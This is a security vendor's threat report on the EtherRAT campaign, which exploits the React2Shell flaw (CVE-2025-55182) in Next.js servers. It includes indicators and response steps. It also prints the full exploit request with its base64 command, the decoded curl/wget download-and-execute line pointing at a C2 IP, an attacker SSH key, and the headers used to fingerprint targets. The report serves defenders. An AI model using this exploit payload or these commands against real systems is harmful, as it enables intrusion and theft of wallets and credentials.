Distribution of EtherRAT Malware Exploiting React2Shell Vulnerability (CVE-2025-55182)

AhnLab SEcurity intelligence Center (ASEC) recently discovered an advanced malware distribution campaign using Node.js while tracking the recently disclosed React2Shell vulnerability. This attack installs EtherRAT through multiple stages, with the ultimate goal of gaining a foothold, stealing information, and stealing cryptocurrency.

 

After the threat actor accessed the IP address on port 80, they immediately sent the React2Shell vulnerability attack packet. They are using an automated script to launch their attacks, and the attacks do not target specific countries but instead attack randomly generated IP addresses. The following shows the packet information used in the attacks.

 

• First Access

Header
GET / HTTP/1.1 Host: { IP Address } Connection: keep-alive

 

• Vulnerability Exploit

Header
POST / HTTP/1.1 Host: { IP Address } Content-Type: multipart/form-data; boundary=—-R2gc3yr5k1ev Next-Action: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Connection: keep-alive Transfer-Encoding: chunked

Data

——R2gc3yr5k1ev Content-Disposition: form-data; name=”0   {“then”:”$1:__proto__:then”,”status”:”resolved_model”,”value”:”{\”then\”:\”$B1337\”}”,”reason”:-1,”_response”:{“_prefix”:”var cp=process.mainModule.require(\”child_process\”);try{cp.exec(\”echo KGN1cmwgLXMgaHR0cDovLzE5My4yNC4xMjMuNjg6MzAwMS9nZmRzZ3NkZmhmc2RfZ2hzZmRnc2ZkZ3NkZmcuc2ggLW8gL3RtcC9zLnNofHx3Z2V0IC1xIC1PIC90bXAvcy5zaCBodHRwOi8vMTkzLjI0LjEyMy42ODozMDAxL2dmZHNnc2RmaGZzZF9naHNmZGdzZmRnc2RmZy5zaCkmJmNobW9kICt4IC90bXAvcy5zaCYmL3RtcC9zLnNoICY=|base64 -d|sh\”)}catch{}\”ok\”//”,”_chunks”:”$Q2″,”_formData”:{“get”:”$1:constructor:constructor”}}} ——R2gc3yr5k1ev Content-Disposition: form-data; name=”1   $@0 ——R2gc3yr5k1ev Content-Disposition: form-data; name=”2 [] ——R2gc3yr5k1ev–

If the vulnerability exploit attack packet is delivered to the vulnerable React server, the following command will be executed.

(curl -s http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh -o /tmp/s.sh||wget -q -O /tmp/s.sh http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh)&&chmod +x /tmp/s.sh&&/tmp/s.sh

 

The “gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh” file downloaded from C2 installs NodeJS (v20.10.0) in a specific system path and creates an encrypted data file and NodeJS script before executing them.

 

The Node.js script executed in this process decrypts the encrypted data file using AES and then executes it. The result of the data file decryption is another Node.js script, which is a malware called EtherRAT. This malware connects to the C2 server periodically and can execute commands.

 

The main feature of EtherRAT is how it obtains the C2 address. It queries an Ethereum contract and extracts the C2 string from the data. The following figure shows the Ethereum contract information and the domain used to query this information.

 

Figure 1. Ethereum contract information and query domain

 

In fact, based on this information, the C2 string can be checked as follows when querying the contract.

Figure 2. Contract query result

 

• C2: hxxp://91.215.85[.]42:3000

 

The C2 URL is created by combining the C2 address obtained through contract lookup, the extensions [png, jpg, gif, css, ico, webp], a randomly generated string, and the variable names [id, token, key, b, q, s, v].

 

Figure 3. C2 URL generation

 

This malware strain can periodically connect to the C2 and perform designated commands. At the time of analysis, the C2 responded by executing a total of 5 additional malicious scripts. These additional scripts behave as follows: stealing cryptocurrency wallets, registering SSH keys, propagation, redirection, and exfiltrating information.

The following are the details of the 5 additional scripts that responded from C2. It is worth noting that some of these scripts contain code written in Russian and code that excludes attacks on countries that were part of the former Soviet Union.

 

 

 

 

Registering SSH Access Key

 

Install SSH key to gain continuous access to the breached system. Key information is as follows.

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFTxaWmhQkYYF2LgNsAumFqxUiUSv8YEd7DRE9Wb076YxY0fGn4scWzmQnIP/xsrynapcrGKhBXW31BG7wFearY9fctJeHrnAw7CeXqMybFPGIrl+PbLsUnH2AeizjqTOhVZMrgO+0MdsNrdGTN58azTRIvDvgXX9/4p5tinRvisP8jQXPwRv9gurT9hbjrff8bFYmbttSkFXzwlvo5jVi3WrDBLeSSaEnolsJbvCGzzNtm2s77O3yesztMOn03YR1b1QWaOZMTQtzS7gvpKQ8voxypyUd2H+qwK1fe3S7t3QHnNBoKxHXi/KsxgFbY9G74SKV15jTFyrJCJOaYQbVSZiz+uPYDRgW4xBKDsKEx5ne2E4oqJVSSNiZ/QJs0+zA3QFIflcR3WrZ6xxw0ivk/nvhzcCsd+K94jK/qheJzrTTvWqjo8FauCN8LtxqQGpbNWHHRJqc2m/lTt8CA2V89RquqMX7FhArF86TnMxHHt9IDDCf07eIEbpLuWGpJLBJeHbqy5h8yB8ZoUj/E3E7+KMd6HGvYkKxn3YItfopArpg6AfWzP0bjyw7yzxdsbElkxL3K6UcBeTBXb/HMOpTE9uyNN4TvczJZAbB6Yy51x2RU4Yd815MFVPVFFn+5/z+ZyK9442c9/UHKMcbOtXkvydWM7v01xCc8tFlIFKa4w== root@vps

 

The script contains an error message in Russian.

 

Figure 4. Error handling code (Russian)

 

Transmission

Scans and attacks the ports of randomly generated IP addresses using [80, 443, 3000, 3001, 8080, 8443]. This attack is not specifically targeting any country.

Figure 5. Code for generating a random IP

 

Upon initial access, a GET request is used. The response to this request is then examined, and if it meets certain conditions, a React vulnerability exploitation packet is sent.

Header Check

x-powered-by: Next.js” “x-nextjs-page:

Main Text Checked

/_next/” “__NEXT_DATA__

[Redirection]

If the script is running, it redirects HTTP packets to a specific URL and sends system information to the webhook address. Accessing the identified attack destination IP address redirects users to a page. This is interpreted as a measure to prevent vulnerability attacks by other scanners.

Figure 6. Information of the redirection packet that responds from the infected system

• Redirection URL: https://xss.pro

• Webhook URL: hxxps://webhook[.]site/63575795-ee27-4b29-a15d-e977e7dc8361

   

Information Theft
The malware steals system information and transmits it to the C2. It collects various information such as OS information, domain information, used AV information, and VGA information. It also checks the system’s locale information and does not perform any behavior if it matches the country code for the following countries.

 

• ru: 러시아
• be: Belarus
• kk: Kazakhstan
• ky: Kyrgyzstan
• tg: Tajikistan
• UZ: Uzbekistan
• hy: Armenia
• az: Azerbaijan
• ka: Georgia

 

Figure 7. Code to check the infected system’s locale

• Transmission URL: hxxp://91.215.85[.]42:3000/{identifier}

 

[Cryptocurrency Theft]

It collects and transmits file data related to cryptocurrency wallet information, SSH key information, cloud configuration information, and console history information to the C2. In particular, it performs a full scan of 2048 strings used for cryptocurrency wallet recovery (BIP39). Files that contain wallet-related strings are also targeted for exfiltration. It scans multiple directories and then transmits the matched file names and data to the C2 below.

 

Figure 8. File collection code

 

• Transmission URL hxxp://91.215.85[.]42:3000/crypto/keys

 

Threat actors exploit such information to launch actual attacks. It is advised to monitor security advisories and keep products up to date with the latest versions.

 

 

[Response Guide]

 

1. Check NodeJS

During the attack, NodeJS version v20.10.0 is installed and executed. If a suspicious NodeJS process is running in a path that was not installed separately, malware infection should be suspected.

The directory used in this attack is shown below and may change continuously.

 

[Path to Create Node.js Script]

• $HOME/.local/share/.05bf0e9b

Installation Path of Node

• $HOME/.local/share/.05bf0e9b/.4dai8ovb/bin/node

 

2. Check the access history of Ethereum contract queries

 

Check the access history of the following URL via HTTPS.

https://eth.llamarpc.com https://mainnet.gateway.tenderly.co https://rpc.flashbots.net/fast https://rpc.mevblocker.io https://eth-mainnet.public.blastapi.io https://ethereum-rpc.publicnode.com https://rpc.payload.de https://eth.drpc.org https://eth.merkle.io

When a contract is queried, the following data is exchanged.

 

• HTTPS POST Request Data

{     “jsonrpc”: “2.0”,     “method”: “eth_call”,     “params”: [{         “to”: “0x22f96d61cf118efabc7c5bf3384734fad2f6ead4”,         “data”: “0x7d434425000000000000000000000000e941a9b283006f5163ee6b01c1f23aa5951c4c8d     }, “latest”],     “id”: 1 }

 

• Response Data (Variable)

{     “id”: 1,     “jsonrpc”: “2.0”,     “result”: “0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000018687474703a2f2f39312e3231352e38352e34323a333030300000000000000000 }

 

3. Check C2 connection logs

 

This attack is currently being conducted through the following C2, which may change continuously.

• http://193.24.123[.]68:3001
• http://91.215.85[.]42:3000

MD5

0522ba68fa6159abc7d00172e732088d

1b81c2192f8bf8a70d100f735de588d1

2eb9a08bb7d0488e4921476bbf21e2f2

4ace9fac792ecd702c2f5595a7a942d2

6ccfcc3e8459b3a48ee2b0a4e469c157

URL

http[:]//193[.]24[.]123[.]68[:]3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg[.]sh

http[:]//91[.]215[.]85[.]42[:]3000/crypto/keys

https[:]//webhook[.]site/63575795-ee27-4b29-a15d-e977e7dc8361

FQDN

193[.]24[.]123[.]68

91[.]215[.]85[.]42

IP

193[.]24[.]123[.]68

91[.]215[.]85[.]42